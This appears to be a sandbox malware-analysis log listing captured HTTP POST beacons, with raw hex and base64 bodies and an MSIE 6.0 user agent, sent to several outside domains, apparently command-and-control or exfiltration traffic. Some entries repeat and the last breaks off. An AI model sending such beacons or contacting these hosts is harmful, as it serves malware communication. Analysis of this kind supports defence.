                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 66 78 64 6f 4d 55 76 66 50 42 53 4e 73 4f 61 41 6f 69 7a 52 55 72 53 48 4a 68 6d 52 73 31 62 72 72 39 31 6a 50 48 58 37 63 6f 38 49 2b 4f 57 34 36 76 31 79 42 4a 4f 6f 56 72 61 47 36 6e 71 78 44 2f 63 4c 6b 38 54 55 59 59 77 57 75 74 67 4d 55 6b 4f 39 6c 72 57 4a 71 49 64 33 53 33 53 2f 44 75 77 6d 58 38 32 52 30 6e 50 63 46 5a 71 2b 44 61 2b 39 2f 7a 49 2f 39 70 57 31 61 69 41 5a 53 64 6b 66 44 79 44 52 35 52 69 42 6d 50 62 6c 36 76 62 30 31 2b 59 51 78 58 56 4b 32 59 42 79 65 35 2b 69 78 62 74 53 72 59 43 61 55 4a 65 63 51 33 58 4a 74 55 6a 57 53 48 68 6e 71 67 6a 4a 35 4f 47 77 41 63 52 63 2f 65 42 61 73 51 43 65 51 4b 71 72 58 72 55 66 37 31 65 77 69 6f 38 6a 4c 58 77 58 66 50 71 6e 59 6a 56 5a 30 30 79 78 4a 66 66 5a 61 6d 48 41 2f 52 34 73 47 75 72 30 39 71 44 6b 41 55 35 43 64 53 77 41 6d 5a 30 71 71 53 2b 6e 7a 45 7a 53 4f 42 52 58 50 5a 6b 74 75 66 74 58 68 36 38 6e 6e 36 75 45 76 68 33 75 56 41 39 6b 46 64 73 6c 47 65 4c 4a 32 57 4c 6a 2b 5a 57 78 6d 4f 4f 59 5a 78 4a 38 34 54 77 79 43 2f 69 55 54 78 34 64 38 79 56 33 58 46 49 7a 47 4f 6b 2b 6d 4c 41 64 44 71 55 63 61 39 4a 2f 70 53 2b 58 30 33 4c 63 33 64 79 66 34 4e 2f 5a 54 4f 6e 67 73 31 6a 50 32 51 77 63 36 58 2b 79 77 4f 41 64 61 66 62 73 54 44 36 45 55 57 75 33 33 77 72 68 67 39 76 74 77 35 67 66 78 4e 5a 53 32 73 34 2b 6c 39 31 79 4e 44 6a 64 6b 53 49 6b 56 47 77 43 49 37 72 38 77 74 72 30 43 63 6b 34 66 72 70 59 65 63 43 4d 2b 78 58 6a 6b 7a 71 4f 2f 48 35 4d 4d 77 77 55 4c 37 56 36 43 71 65 72 6e 50 51 7a 46 43 53 4f 44 54 66 2b 35 63 35 44 7a 6d 71 6a 4b 36 7a 49 59 4e 78 56 47 78 54 32 5a 57 6d 6f 4f 34 5a 6c 70 6d 72 46 49 37 52 6f 59 6b 43 54 36 32 50 72 55 39 6d 56 4a 4e 6b 46 2b 69 7a 63 33 77 3d 3d Data Ascii: fxdoMUvfPBSNsOaAoizRUrSHJhmRs1brr91jPHX7co8I+OW46v1yBJOoVraG6nqxD/cLk8TUYYwWutgMUkO9lrWJqId3S3S/DuwmX82R0nPcFZq+Da+9/zI/9pW1aiAZSdkfDyDR5RiBmPbl6vb01+YQxXVK2YBye5+ixbtSrYCaUJecQ3XJtUjWSHhnqgjJ5OGwAcRc/eBasQCeQKqrXrUf71ewio8jLXwXfPqnYjVZ00yxJffZamHA/R4sGur09qDkAU5CdSwAmZ0qqS+nzEzSOBRXPZktuftXh68nn6uEvh3uVA9kFdslGeLJ2WLj+ZWxmOOYZxJ84TwyC/iUTx4d8yV3XFIzGOk+mLAdDqUca9J/pS+X03Lc3dyf4N/ZTOngs1jP2Qwc6X+ywOAdafbsTD6EUWu33wrhg9vtw5gfxNZS2s4+l91yNDjdkSIkVGwCI7r8wtr0Cck4frpYecCM+xXjkzqO/H5MMwwUL7V6CqernPQzFCSODTf+5c5DzmqjK6zIYNxVGxT2ZWmoO4ZlpmrFI7RoYkCT62PrU9mVJNkF+izc3w==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 6a 55 56 44 49 37 68 70 50 42 53 4d 30 7a 35 63 4f 36 47 58 71 4b 73 52 63 41 45 41 78 34 2f 69 62 4a 69 4f 46 46 59 35 32 57 43 55 71 57 41 46 68 33 75 59 77 33 70 65 54 35 4f 6d 33 6d 53 65 63 52 4e 6a 6e 56 38 4c 36 72 6e 69 55 77 30 37 69 79 70 78 38 2f 34 46 57 2b 71 65 35 2f 6f 42 2f 6e 33 70 39 59 2b 34 4c 41 54 55 47 61 54 38 36 76 6b 2b 45 33 5a 4b 55 6f 77 38 46 6d 65 5a 68 4e 43 31 4e 32 78 37 5a 46 42 79 7a 36 55 4b 65 63 33 49 47 73 38 72 4a 35 6d 6b 56 5a 67 44 72 4d 51 42 71 35 73 4b 70 43 42 71 6e 44 41 6c 65 6e 49 72 4d 37 6f 76 4b 65 58 4d 30 77 6e 6b 44 66 74 58 50 7a 4c 55 73 49 63 4a 4b 38 42 56 46 37 71 7a 72 74 71 53 45 73 6c 32 41 4b 52 63 52 49 76 41 6c 6c 79 4c 75 44 58 33 77 59 73 4d 6f 69 69 55 2f 6a 71 4a 45 52 6e 64 41 64 64 2f 6e 36 32 61 77 50 45 71 6f 47 53 50 6e 62 44 52 7a 72 46 33 6a 74 30 46 41 30 46 6b 46 37 54 4b 52 66 56 31 5a 36 45 32 42 36 38 5a 46 61 4e 4e 4d 6b 45 48 65 71 6b 74 72 6f 33 39 6a 77 4a 34 49 6d 4c 56 62 48 37 2b 35 7a 71 69 57 45 71 2b 76 36 57 6e 46 68 6c 79 61 51 71 67 2b 43 59 75 36 55 48 6c 42 6a 79 39 46 4e 41 78 67 4a 76 76 71 65 69 6e 67 43 65 34 43 6b 4a 67 52 2f 33 79 58 78 6e 78 78 47 32 6a 64 45 56 74 4a 62 6e 68 51 53 37 55 61 52 63 77 6b 6e 61 34 42 71 66 74 6e 68 77 6c 71 48 43 57 55 37 6c 4d 6b 6f 4a 72 73 4b 57 6d 47 41 35 37 31 48 61 31 50 30 4e 63 64 58 4b 64 2f 35 43 4b 33 4f 79 6c 2b 59 58 78 6e 73 45 78 73 76 30 56 53 4f 68 4a 33 42 59 47 66 68 30 6b 5a 68 31 61 35 79 6b 63 41 4b 6d 4b 46 4a 53 4c 75 6f 6b 67 66 77 58 4d 30 63 6a 64 5a 66 52 34 6e 58 53 67 38 64 52 71 56 79 51 66 59 4a 44 4b 78 30 43 53 38 4a 47 47 5a 6b 57 63 47 70 58 30 44 36 6c 31 57 79 36 53 4d 4d 58 42 34 67 3d 3d Data Ascii: jUVDI7hpPBSM0z5cO6GXqKsRcAEAx4/ibJiOFFY52WCUqWAFh3uYw3peT5Om3mSecRNjnV8L6rniUw07iypx8/4FW+qe5/oB/n3p9Y+4LATUGaT86vk+E3ZKUow8FmeZhNC1N2x7ZFByz6UKec3IGs8rJ5mkVZgDrMQBq5sKpCBqnDAlenIrM7ovKeXM0wnkDftXPzLUsIcJK8BVF7qzrtqSEsl2AKRcRIvAllyLuDX3wYsMoiiU/jqJERndAdd/n62awPEqoGSPnbDRzrF3jt0FA0FkF7TKRfV1Z6E2B68ZFaNNMkEHeqktro39jwJ4ImLVbH7+5zqiWEq+v6WnFhlyaQqg+CYu6UHlBjy9FNAxgJvvqeingCe4CkJgR/3yXxnxxG2jdEVtJbnhQS7UaRcwkna4BqftnhwlqHCWU7lMkoJrsKWmGA571Ha1P0NcdXKd/5CK3Oyl+YXxnsExsv0VSOhJ3BYGfh0kZh1a5ykcAKmKFJSLuokgfwXM0cjdZfR4nXSg8dRqVyQfYJDKx0CS8JGGZkWcGpX0D6l1Wy6SMMXB4g==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 67 53 30 6e 4e 78 55 50 50 52 51 77 38 6e 4f 39 2f 42 57 59 45 41 36 6f 6f 73 51 6a 2b 4f 71 6a 47 58 55 58 47 47 35 6e 7a 76 6d 45 6b 53 35 67 51 56 4f 52 42 45 73 47 7a 49 42 59 5a 62 42 50 33 56 58 44 58 4a 32 4e 61 4f 52 37 2f 4e 45 71 68 33 5a 78 70 65 2f 4a 49 44 69 6b 4d 75 59 6e 4f 58 77 4c 6b 4b 50 48 67 38 32 43 42 6e 74 51 53 33 2f 54 52 33 62 47 47 4b 70 4e 59 64 73 65 44 34 37 74 6a 4a 31 59 63 39 57 49 68 51 79 59 7a 51 6a 46 79 43 53 59 68 4f 41 36 2f 67 73 54 47 31 58 6a 53 2b 2f 43 4d 56 45 44 41 34 6e 41 59 34 4c 52 34 51 6b 53 69 42 70 64 4b 38 4d 62 77 51 30 70 6d 51 79 4c 34 39 2f 5a 41 33 6a 75 36 51 67 49 33 67 56 56 4e 2b 30 39 42 41 38 62 37 32 63 4e 68 36 66 36 67 33 55 61 78 79 4f 6e 4d 4b 44 74 4c 46 4b 68 2f 36 59 31 59 34 44 33 57 73 57 44 69 51 52 37 47 76 6c 2b 44 71 78 67 78 72 36 4e 71 44 65 51 69 6e 53 6a 74 2f 75 55 6d 34 50 61 36 31 77 58 45 78 6a 45 33 65 2f 76 6e 57 66 4f 6d 4c 52 37 79 32 34 35 34 4e 54 4a 79 35 35 70 54 2b 45 32 61 75 4e 51 4f 6b 61 78 77 73 63 33 6a 37 35 53 33 44 4b 79 73 63 31 46 47 33 4e 6f 31 70 45 76 72 66 50 68 68 74 64 6e 4b 6b 30 2b 4b 66 35 6d 32 56 36 63 79 67 79 30 44 6a 43 77 68 2b 67 74 37 41 39 37 77 4f 77 2b 75 31 49 36 71 6c 46 50 49 62 61 4b 6f 62 67 59 68 58 32 64 4a 59 34 58 57 49 2b 6c 67 31 4c 6c 73 69 32 74 72 6a 74 4d 70 2f 49 70 48 69 76 35 43 6e 35 2f 61 48 71 73 45 6d 30 54 30 46 4d 32 50 32 6d 47 52 34 75 69 42 54 59 4c 4b 59 67 5a 48 4a 66 2b 42 6a 44 72 33 45 74 4c 37 78 78 34 34 51 30 4f 55 71 30 71 6d 75 70 54 59 4c 48 4a 78 46 47 6f 4d 48 43 6e 41 74 2f 63 57 6e 54 45 6a 79 78 5a 52 6a 31 4f 69 43 4e 35 72 4a 30 4c 50 32 73 6d 56 77 48 54 Data Ascii: gS0nNxUPPRQw8nO9/BWYEA6oosQj+OqjGXUXGG5nzvmEkS5gQVORBEsGzIBYZbBP3VXDXJ2NaOR7/NEqh3Zxpe/JIDikMuYnOXwLkKPHg82CBntQS3/TR3bGGKpNYdseD47tjJ1Yc9WIhQyYzQjFyCSYhOA6/gsTG1XjS+/CMVEDA4nAY4LR4QkSiBpdK8MbwQ0pmQyL49/ZA3ju6QgI3gVVN+09BA8b72cNh6f6g3UaxyOnMKDtLFKh/6Y1Y4D3WsWDiQR7Gvl+Dqxgxr6NqDeQinSjt/uUm4Pa61wXExjE3e/vnWfOmLR7y2454NTJy55pT+E2auNQOkaxwsc3j75S3DKysc1FG3No1pEvrfPhhtdnKk0+Kf5m2V6cygy0DjCwh+gt7A97wOw+u1I6qlFPIbaKobgYhX2dJY4XWI+lg1Llsi2trjtMp/IpHiv5Cn5/aHqsEm0T0FM2P2mGR4uiBTYLKYgZHJf+BjDr3EtL7xx44Q0OUq0qmupTYLHJxFGoMHCnAt/cWnTEjyxZRj1OiCN5rJ0LP2smVwHT
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 2b 66 66 45 6a 71 4e 34 61 52 53 4a 48 43 35 55 4b 67 58 47 45 38 78 69 38 37 44 4a 34 32 47 6c 68 78 69 63 4a 69 6f 35 4d 50 6f 33 66 71 65 62 61 65 6a 7a 51 53 63 30 49 4a 31 71 46 73 64 2b 5a 52 6e 71 58 6f 59 35 56 35 50 30 53 55 36 41 49 34 41 72 54 34 79 65 32 79 35 64 2b 73 70 64 4d 56 37 4a 76 67 79 6f 62 45 50 73 38 50 69 2b 4d 30 6c 33 7a 4f 4b 6c 41 43 73 54 6e 56 56 53 62 6b 39 6e 31 78 4e 74 34 62 49 70 55 4b 6d 51 74 2b 45 7a 48 38 41 69 45 4c 71 46 51 71 4d 46 62 4a 33 58 4c 50 2b 73 76 66 58 4d 68 57 6e 63 4d 32 51 72 57 75 51 72 52 76 67 58 77 6a 41 73 78 51 4b 53 58 56 44 68 78 47 72 47 77 62 46 4e 49 33 5a 6a 46 55 6e 37 66 41 34 58 71 69 68 33 38 54 4f 34 49 64 33 35 59 63 71 65 61 50 37 72 56 57 64 75 35 49 75 4f 68 35 45 50 6e 65 33 63 6e 45 76 44 30 75 58 31 66 68 65 63 32 7a 72 38 4a 4d 5a 70 31 41 70 73 50 56 75 47 69 58 6b 4f 39 6e 58 49 44 31 50 5a 6f 52 4f 73 6f 4f 4d 72 73 64 53 74 57 62 74 5a 42 79 59 52 72 38 35 67 4e 69 75 39 69 56 4a 71 54 2f 41 75 48 2b 76 32 57 34 6b 53 57 5a 34 78 6c 67 37 59 39 67 50 72 39 38 67 52 6f 2f 47 45 71 45 6e 67 78 59 54 6e 62 6c 41 75 75 51 4c 4f 57 6e 51 50 7a 6c 37 31 54 53 46 36 73 32 75 58 74 30 58 6f 59 54 33 42 58 66 59 77 74 4f 4f 4c 57 5a 6a 6c 44 34 32 4f 59 47 63 67 77 6b 49 6c 57 44 69 49 31 30 50 78 32 66 70 51 56 47 46 4e 78 47 72 6f 74 37 49 55 67 62 4d 70 45 31 52 52 42 58 46 36 52 47 59 42 66 30 63 2b 34 6e 2b 62 4c 76 50 74 48 75 46 34 68 46 4c 64 57 73 77 51 49 2b 38 58 53 66 46 61 57 31 45 37 74 64 62 33 77 4f 48 67 4a 74 34 5a 37 73 4c 42 5a 34 38 36 76 78 2f 53 45 61 38 4f 4f 47 56 52 62 58 48 55 Data Ascii: +ffEjqN4aRSJHC5UKgXGE8xi87DJ42GlhxicJio5MPo3fqebaejzQSc0IJ1qFsd+ZRnqXoY5V5P0SU6AI4ArT4ye2y5d+spdMV7JvgyobEPs8Pi+M0l3zOKlACsTnVVSbk9n1xNt4bIpUKmQt+EzH8AiELqFQqMFbJ3XLP+svfXMhWncM2QrWuQrRvgXwjAsxQKSXVDhxGrGwbFNI3ZjFUn7fA4Xqih38TO4Id35YcqeaP7rVWdu5IuOh5EPne3cnEvD0uX1fhec2zr8JMZp1ApsPVuGiXkO9nXID1PZoROsoOMrsdStWbtZByYRr85gNiu9iVJqT/AuH+v2W4kSWZ4xlg7Y9gPr98gRo/GEqEngxYTnblAuuQLOWnQPzl71TSF6s2uXt0XoYT3BXfYwtOOLWZjlD42OYGcgwkIlWDiI10Px2fpQVGFNxGrot7IUgbMpE1RRBXF6RGYBf0c+4n+bLvPtHuF4hFLdWswQI+8XSfFaW1E7tdb3wOHgJt4Z7sLBZ486vx/SEa8OOGVRbXHU
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 6e 77 76 37 56 6b 30 32 44 42 52 6f 4e 54 5a 47 78 47 4d 31 62 41 61 73 75 37 4b 37 2b 2f 77 56 30 53 74 49 61 6a 4f 79 36 59 4f 6b 31 41 53 4d 2f 50 67 2b 53 54 55 4c 62 6e 65 64 66 36 68 6e 4b 6c 51 53 55 30 48 48 75 62 67 66 4a 48 43 63 57 4b 73 6d 53 6b 77 71 47 54 4e 64 30 2b 4f 38 4d 2f 30 6b 59 44 44 46 67 49 68 54 61 53 61 30 4f 61 70 63 32 6a 47 4d 46 63 52 31 38 2f 72 72 2f 4a 65 79 48 42 51 41 2f 6e 4a 4c 4a 44 45 48 6f 63 6e 48 56 48 78 73 6a 6e 67 6f 4c 64 70 49 33 41 63 30 62 78 68 6b 58 45 6b 34 39 4e 74 79 57 59 66 36 77 79 6b 4d 52 53 6c 41 34 73 33 62 51 37 4e 55 63 4c 73 6f 39 31 66 56 4c 30 41 76 52 59 6a 69 50 74 43 61 35 6e 4b 31 4b 61 6f 6d 62 73 56 63 6f 45 33 33 35 38 61 64 4a 56 57 47 6c 6a 79 55 52 33 56 38 6c 36 37 47 64 4b 45 78 62 62 6e 79 45 47 61 71 45 33 61 77 38 4f 50 51 70 50 67 56 56 41 43 4d 43 51 6e 6d 6d 39 2b 39 4d 78 75 53 66 5a 54 48 6d 74 47 6d 76 5a 71 43 2f 77 4c 6c 67 6e 69 30 4e 45 68 63 6d 47 64 72 7a 2b 30 62 70 77 49 63 49 45 74 50 79 5a 51 70 33 46 65 65 4e 46 47 75 67 4f 73 66 6d 72 50 4e 36 77 6d 67 53 30 30 6a 51 5a 64 76 43 4c 46 58 45 76 39 45 48 34 64 56 65 63 4b 33 73 77 4e 4a 79 6b 47 53 68 50 42 33 53 69 55 32 35 41 4b 68 67 7a 66 63 31 6b 36 6c 39 58 72 41 6a 5a 46 4e 6e 42 74 31 6d 6a 42 6c 30 67 72 72 5a 30 37 4e 67 55 2b 4f 4a 47 33 38 34 75 51 6c 42 6e 36 49 46 33 4f 78 61 55 46 54 52 4d 37 63 79 45 32 68 6c 4a 61 39 4a 75 48 52 46 71 46 70 6c 4c 73 57 44 55 59 63 62 38 75 38 63 4e 45 50 6d 61 4c 46 72 56 74 4d 47 50 77 71 33 68 32 79 4c 31 31 54 79 41 33 66 53 58 50 71 77 72 71 77 6e 38 4a 4c 44 4f 64 62 6d 71 37 66 61 45 66 34 4e 72 51 66 70 48 72 77 36 54 4a 72 55 74 36 36 44 48 38 4f 77 31 45 78 71 73 59 68 34 66 6f 3d Data Ascii: nwv7Vk02DBRoNTZGxGM1bAasu7K7+/wV0StIajOy6YOk1ASM/Pg+STULbnedf6hnKlQSU0HHubgfJHCcWKsmSkwqGTNd0+O8M/0kYDDFgIhTaSa0Oapc2jGMFcR18/rr/JeyHBQA/nJLJDEHocnHVHxsjngoLdpI3Ac0bxhkXEk49NtyWYf6wykMRSlA4s3bQ7NUcLso91fVL0AvRYjiPtCa5nK1KaombsVcoE3358adJVWGljyUR3V8l67GdKExbbnyEGaqE3aw8OPQpPgVVACMCQnmm9+9MxuSfZTHmtGmvZqC/wLlgni0NEhcmGdrz+0bpwIcIEtPyZQp3FeeNFGugOsfmrPN6wmgS00jQZdvCLFXEv9EH4dVecK3swNJykGShPB3SiU25AKhgzfc1k6l9XrAjZFNnBt1mjBl0grrZ07NgU+OJG384uQlBn6IF3OxaUFTRM7cyE2hlJa9JuHRFqFplLsWDUYcb8u8cNEPmaLFrVtMGPwq3h2yL11TyA3fSXPqwrqwn8JLDOdbmq7faEf4NrQfpHrw6TJrUt66DH8Ow1ExqsYh4fo=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 66 78 64 6f 4d 55 76 66 50 42 53 4e 73 4f 61 41 6f 69 7a 52 55 72 53 48 4a 68 6d 52 73 31 62 72 72 39 31 6a 50 48 58 37 63 6f 38 49 2b 4f 57 34 36 76 31 79 42 4a 4f 6f 56 72 61 47 36 6e 71 78 44 2f 63 4c 6b 38 54 55 59 59 77 57 75 74 67 4d 55 6b 4f 39 6c 72 57 4a 71 49 64 33 53 33 53 2f 44 75 77 6d 58 38 32 52 30 6e 50 63 46 5a 71 2b 44 61 2b 39 2f 7a 49 2f 39 70 57 31 61 69 41 5a 53 64 6b 66 44 79 44 52 35 52 69 42 6d 50 62 6c 36 76 62 30 31 2b 59 51 78 58 56 4b 32 59 42 79 65 35 2b 69 78 62 74 53 72 59 43 61 55 4a 65 63 51 33 58 4a 74 55 6a 57 53 48 68 6e 71 67 6a 4a 35 4f 47 77 41 63 52 63 2f 65 42 61 73 51 43 65 51 4b 71 72 58 72 55 66 37 31 65 77 69 6f 38 6a 4c 58 77 58 66 50 71 6e 59 6a 56 5a 30 30 79 78 4a 66 66 5a 61 6d 48 41 2f 52 34 73 47 75 72 30 39 71 44 6b 41 55 35 43 64 53 77 41 6d 5a 30 71 71 53 2b 6e 7a 45 7a 53 4f 42 52 58 50 5a 6b 74 75 66 74 58 68 36 38 6e 6e 36 75 45 76 68 33 75 56 41 39 6b 46 64 73 6c 47 65 4c 4a 32 57 4c 6a 2b 5a 57 78 6d 4f 4f 59 5a 78 4a 38 34 54 77 79 43 2f 69 55 54 78 34 64 38 79 56 33 58 46 49 7a 47 4f 6b 2b 6d 4c 41 64 44 71 55 63 61 39 4a 2f 70 53 2b 58 30 33 4c 63 33 64 79 66 34 4e 2f 5a 54 4f 6e 67 73 31 6a 50 32 51 77 63 36 58 2b 79 77 4f 41 64 61 66 62 73 54 44 36 45 55 57 75 33 33 77 72 68 67 39 76 74 77 35 67 66 78 4e 5a 53 32 73 34 2b 6c 39 31 79 4e 44 6a 64 6b 53 49 6b 56 47 77 43 49 37 72 38 77 74 72 30 43 63 6b 34 66 72 70 59 65 63 43 4d 2b 78 58 6a 6b 7a 71 4f 2f 48 35 4d 4d 77 77 55 4c 37 56 36 43 71 65 72 6e 50 51 7a 46 43 53 4f 44 54 66 2b 35 63 35 44 7a 6d 71 6a 4b 36 7a 49 59 4e 78 56 47 78 54 32 5a 57 6d 6f 4f 34 5a 6c 70 6d 72 46 49 37 52 6f 59 6b 43 54 36 32 50 72 55 39 6d 56 4a 4e 6b 46 2b 69 7a 63 33 77 3d 3d Data Ascii: fxdoMUvfPBSNsOaAoizRUrSHJhmRs1brr91jPHX7co8I+OW46v1yBJOoVraG6nqxD/cLk8TUYYwWutgMUkO9lrWJqId3S3S/DuwmX82R0nPcFZq+Da+9/zI/9pW1aiAZSdkfDyDR5RiBmPbl6vb01+YQxXVK2YBye5+ixbtSrYCaUJecQ3XJtUjWSHhnqgjJ5OGwAcRc/eBasQCeQKqrXrUf71ewio8jLXwXfPqnYjVZ00yxJffZamHA/R4sGur09qDkAU5CdSwAmZ0qqS+nzEzSOBRXPZktuftXh68nn6uEvh3uVA9kFdslGeLJ2WLj+ZWxmOOYZxJ84TwyC/iUTx4d8yV3XFIzGOk+mLAdDqUca9J/pS+X03Lc3dyf4N/ZTOngs1jP2Qwc6X+ywOAdafbsTD6EUWu33wrhg9vtw5gfxNZS2s4+l91yNDjdkSIkVGwCI7r8wtr0Cck4frpYecCM+xXjkzqO/H5MMwwUL7V6CqernPQzFCSODTf+5c5DzmqjK6zIYNxVGxT2ZWmoO4ZlpmrFI7RoYkCT62PrU9mVJNkF+izc3w==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 2b 66 66 45 6a 71 4e 34 61 52 53 4a 48 43 35 55 4b 67 58 47 45 38 78 69 38 37 44 4a 34 32 47 6c 68 78 69 63 4a 69 6f 35 4d 50 6f 33 66 71 65 62 61 65 6a 7a 51 53 63 30 49 4a 31 71 46 73 64 2b 5a 52 6e 71 58 6f 59 35 56 35 50 30 53 55 36 41 49 34 41 72 54 34 79 65 32 79 35 64 2b 73 70 64 4d 56 37 4a 76 67 79 6f 62 45 50 73 38 50 69 2b 4d 30 6c 33 7a 4f 4b 6c 41 43 73 54 6e 56 56 53 62 6b 39 6e 31 78 4e 74 34 62 49 70 55 4b 6d 51 74 2b 45 7a 48 38 41 69 45 4c 71 46 51 71 4d 46 62 4a 33 58 4c 50 2b 73 76 66 58 4d 68 57 6e 63 4d 32 51 72 57 75 51 72 52 76 67 58 77 6a 41 73 78 51 4b 53 58 56 44 68 78 47 72 47 77 62 46 4e 49 33 5a 6a 46 55 6e 37 66 41 34 58 71 69 68 33 38 54 4f 34 49 64 33 35 59 63 71 65 61 50 37 72 56 57 64 75 35 49 75 4f 68 35 45 50 6e 65 33 63 6e 45 76 44 30 75 58 31 66 68 65 63 32 7a 72 38 4a 4d 5a 70 31 41 70 73 50 56 75 47 69 58 6b 4f 39 6e 58 49 44 31 50 5a 6f 52 4f 73 6f 4f 4d 72 73 64 53 74 57 62 74 5a 42 79 59 52 72 38 35 67 4e 69 75 39 69 56 4a 71 54 2f 41 75 48 2b 76 32 57 34 6b 53 57 5a 34 78 6c 67 37 59 39 67 50 72 39 38 67 52 6f 2f 47 45 71 45 6e 67 78 59 54 6e 62 6c 41 75 75 51 4c 4f 57 6e 51 50 7a 6c 37 31 54 53 46 36 73 32 75 58 74 30 58 6f 59 54 33 42 58 66 59 77 74 4f 4f 4c 57 5a 6a 6c 44 34 32 4f 59 47 63 67 77 6b 49 6c 57 44 69 49 31 30 50 78 32 66 70 51 56 47 46 4e 78 47 72 6f 74 37 49 55 67 62 4d 70 45 31 52 52 42 58 46 36 52 47 59 42 66 30 63 2b 34 6e 2b 62 4c 76 50 74 48 75 46 34 68 46 4c 64 57 73 77 51 49 2b 38 58 53 66 46 61 57 31 45 37 74 64 62 33 77 4f 48 67 4a 74 34 5a 37 73 4c 42 5a 34 38 36 76 78 2f 53 45 61 38 4f 4f 47 56 52 62 58 48 55 Data Ascii: +ffEjqN4aRSJHC5UKgXGE8xi87DJ42GlhxicJio5MPo3fqebaejzQSc0IJ1qFsd+ZRnqXoY5V5P0SU6AI4ArT4ye2y5d+spdMV7JvgyobEPs8Pi+M0l3zOKlACsTnVVSbk9n1xNt4bIpUKmQt+EzH8AiELqFQqMFbJ3XLP+svfXMhWncM2QrWuQrRvgXwjAsxQKSXVDhxGrGwbFNI3ZjFUn7fA4Xqih38TO4Id35YcqeaP7rVWdu5IuOh5EPne3cnEvD0uX1fhec2zr8JMZp1ApsPVuGiXkO9nXID1PZoROsoOMrsdStWbtZByYRr85gNiu9iVJqT/AuH+v2W4kSWZ4xlg7Y9gPr98gRo/GEqEngxYTnblAuuQLOWnQPzl71TSF6s2uXt0XoYT3BXfYwtOOLWZjlD42OYGcgwkIlWDiI10Px2fpQVGFNxGrot7IUgbMpE1RRBXF6RGYBf0c+4n+bLvPtHuF4hFLdWswQI+8XSfFaW1E7tdb3wOHgJt4Z7sLBZ486vx/SEa8OOGVRbXHU
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 6d 42 64 54 6a 58 41 67 32 41 64 4a 4b 37 66 5a 67 7a 6c 46 36 69 50 52 4a 55 6b 59 55 4d 79 6a 70 47 61 59 5a 6a 77 49 6e 58 42 66 4b 57 49 70 34 34 61 6b 2b 4b 49 62 69 35 72 45 4a 59 4b 57 4e 65 38 32 4a 67 70 56 5a 32 76 37 4c 6a 6a 44 75 36 66 68 64 4e 68 57 36 71 67 52 6a 71 42 48 62 7a 77 79 6f 57 6d 77 67 49 74 78 35 74 32 4c 77 46 7a 33 43 44 45 34 57 39 2b 74 55 5a 56 30 50 52 7a 64 78 44 32 4e 46 55 2b 4a 34 49 47 65 33 6c 53 47 47 31 56 50 42 6c 55 6d 4c 52 70 66 63 6b 2b 51 36 6e 57 74 53 78 32 46 41 6f 67 34 45 67 4a 62 2b 74 78 73 42 56 63 79 43 4e 75 4b 7a 78 71 71 4a 4b 65 4e 45 55 4a 63 55 41 55 56 64 38 74 7a 6b 54 75 51 4b 73 54 4a 6a 6a 61 50 43 46 48 6a 74 38 4e 66 61 55 79 47 66 39 35 66 59 53 51 6c 31 42 54 5a 45 74 6b 6e 32 65 4d 68 51 4c 35 35 62 65 44 66 51 2f 6e 57 74 67 6d 77 6e 56 77 6b 68 54 34 75 4e 63 74 71 64 34 69 66 68 49 63 36 34 6d 38 46 79 30 70 42 68 33 41 7a 33 78 61 54 4e 31 54 32 50 4c 47 68 52 61 31 50 76 41 6c 79 69 4e 75 50 41 55 63 6a 65 42 61 57 5a 57 4a 41 73 69 36 33 65 4b 58 2f 72 6c 47 45 73 52 73 44 52 6b 41 74 37 41 44 5a 47 65 4e 67 72 45 74 35 6d 6e 62 34 2b 73 51 57 54 4d 56 43 58 31 4a 78 70 41 64 4f 6d 44 73 49 71 35 38 7a 6a 67 5a 2b 65 35 74 47 41 64 51 4a 75 6b 58 49 53 76 6d 30 62 62 54 71 71 47 34 73 76 4f 4c 2b 33 59 52 58 6e 44 63 72 67 75 4b 68 41 62 32 63 6c 6f 6e 6e 67 66 4d 78 38 33 36 70 42 2b 66 65 46 53 4a 6d 52 49 42 71 58 7a 71 30 77 4d 48 39 36 52 68 42 43 70 6f 69 38 2b 65 33 41 41 2f 6b 2b 30 45 33 53 68 4f 34 78 72 37 6b 77 49 79 56 72 2b 4d 37 6c 42 56 65 79 69 34 69 33 42 5a 4a 51 4f 6a 53 42 49 2b 5a 54 38 47 73 6c 73 2f 47 44 67 74 49 30 70 50 42 6e 41 64 69 2b 32 76 48 69 52 5a 2f 4b 47 51 6d 4e 31 50 62 6d 49 2b 31 Data Ascii: 